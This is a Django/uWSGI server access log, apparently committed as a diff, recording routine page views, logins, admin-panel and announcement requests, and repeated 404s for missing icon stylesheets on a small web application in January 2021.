+[pid: 661|app: 0|req: 2236/2993] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:14 2021] GET /all-4-0-0 => generated 10003 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2994] 180.160.48.43 () {40 vars in 903 bytes} [Thu Jan 14 12:49:14 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 2237/2995] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:15 2021] GET /single/2/ => generated 9534 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+[]
+[pid: 661|app: 0|req: 2238/2996] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:18 2021] GET /all-3-0-0 => generated 10006 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 2239/2997] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:49:19 2021] GET /all-0-0-0 => generated 13672 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2998] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2999] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/3000] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:49:19 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+...The work of process 661 is done. Seeya!
+worker 1 killed successfully (pid: 661)
+Respawned uWSGI worker 1 (new pid: 15176)
+[pid: 15176|app: 0|req: 2240/3001] 180.160.48.43 () {40 vars in 936 bytes} [Thu Jan 14 12:49:21 2021] GET /ownpublish-0-0-0 => generated 10376 bytes in 62 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2241/3002] 180.160.48.43 () {40 vars in 914 bytes} [Thu Jan 14 12:49:27 2021] GET /home/ => generated 10101 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3003] 180.160.48.43 () {40 vars in 864 bytes} [Thu Jan 14 12:49:27 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: 0|req: 2242/3004] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 12:49:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2243/3005] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:49:37 2021] GET /my-admin/ => generated 5366 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 15176|app: 0|req: 2244/3006] 180.160.48.43 () {38 vars in 806 bytes} [Thu Jan 14 12:49:37 2021] GET /favicon.ico => generated 3480 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2245/3007] 180.160.48.43 () {48 vars in 1016 bytes} [Thu Jan 14 12:49:41 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2246/3008] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 12:49:41 2021] GET /admin-home/ => generated 22351 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3009] 180.160.48.43 () {40 vars in 860 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3010] 180.160.48.43 () {40 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3011] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2247/3012] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2248/3013] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2249/3014] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2250/3015] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2251/3016] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2252/3017] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2253/3018] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2254/3019] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:41 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3020] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2255/3021] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:41 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3022] 180.160.48.43 () {40 vars in 901 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3023] 180.160.48.43 () {40 vars in 907 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3024] 180.160.48.43 () {40 vars in 865 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3025] 180.160.48.43 () {40 vars in 853 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3026] 180.160.48.43 () {40 vars in 841 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3027] 180.160.48.43 () {40 vars in 929 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3028] 180.160.48.43 () {40 vars in 851 bytes} [Thu Jan 14 12:49:41 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3029] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 12:49:41 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+zhiding
+置顶
+[pid: 15176|app: 0|req: 2256/3030] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 12:49:56 2021] POST /admin-home/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2257/3031] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 12:49:57 2021] GET /admin-home/ => generated 22351 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2258/3032] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2259/3033] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2260/3034] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2261/3035] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2262/3036] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2263/3037] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2264/3038] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2265/3039] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:57 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2266/3040] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:57 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2267/3041] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 12:49:58 2021] GET /announcement/ => generated 11847 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2268/3042] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2269/3043] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2270/3044] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2271/3045] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2272/3046] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2273/3047] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2274/3048] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:49:58 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2275/3049] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:49:58 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2276/3050] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:49:58 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2277/3051] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 12:50:04 2021] POST /announcement/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2278/3052] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 12:50:04 2021] GET /announcement/ => generated 10914 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2279/3053] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2280/3054] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2281/3055] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2282/3056] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2283/3057] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2284/3058] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:50:04 2021] GET /static/css/spinners.css => generated 3516 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2285/3059] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2286/3060] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:50:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2287/3061] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:50:04 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2288/3062] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 12:51:12 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 15176|app: -1|req: -1/3063] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3064] 219.228.146.135 () {40 vars in 887 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3065] 219.228.146.135 () {40 vars in 869 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3066] 219.228.146.135 () {40 vars in 873 bytes} [Thu Jan 14 12:51:12 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3067] 219.228.146.135 () {40 vars in 908 bytes} [Thu Jan 14 12:51:12 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: 0|req: 2289/3068] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 12:51:25 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2290/3069] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 12:51:25 2021] GET /home/ => generated 10331 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3070] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 12:51:25 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 15176|app: -1|req: -1/3071] 219.228.146.135 () {40 vars in 895 bytes} [Thu Jan 14 12:51:25 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+0
+[]
+[pid: 15176|app: 0|req: 2291/3072] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:51:43 2021] GET /all-3-0-0 => generated 9986 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2292/3073] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 12:51:46 2021] GET /ownpublish-0-0-0 => generated 9822 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2293/3074] 219.228.146.135 () {40 vars in 929 bytes} [Thu Jan 14 12:51:50 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2294/3075] 219.228.146.135 () {40 vars in 923 bytes} [Thu Jan 14 12:51:55 2021] GET /home/ => generated 10331 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2295/3076] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 12:51:58 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2296/3077] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:51:58 2021] GET /single/4/ => generated 9392 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2298/3078] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 12:52:30 2021] GET /announcement/? => generated 10914 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2298/3079] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 12:52:30 2021] POST /announcement/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2299/3080] 180.160.48.43 () {38 vars in 883 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2300/3081] 180.160.48.43 () {38 vars in 895 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2301/3082] 180.160.48.43 () {38 vars in 927 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2302/3083] 180.160.48.43 () {38 vars in 851 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2303/3084] 180.160.48.43 () {38 vars in 871 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2304/3085] 180.160.48.43 () {38 vars in 887 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2305/3086] 180.160.48.43 () {38 vars in 871 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2306/3087] 180.160.48.43 () {38 vars in 819 bytes} [Thu Jan 14 12:52:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2307/3088] 180.160.48.43 () {38 vars in 817 bytes} [Thu Jan 14 12:52:30 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2308/3089] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 12:52:33 2021] GET /announcement/ => generated 11798 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2309/3090] 180.160.48.43 () {38 vars in 883 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2310/3091] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
